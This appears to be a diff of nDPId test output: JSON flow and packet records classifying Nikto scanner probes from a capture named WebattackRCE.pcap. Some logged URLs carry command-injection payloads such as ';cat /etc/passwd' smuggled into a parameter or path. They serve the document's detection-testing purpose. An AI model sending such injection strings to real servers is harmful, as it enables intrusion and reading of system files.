00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} 
+01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} 
+01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} 
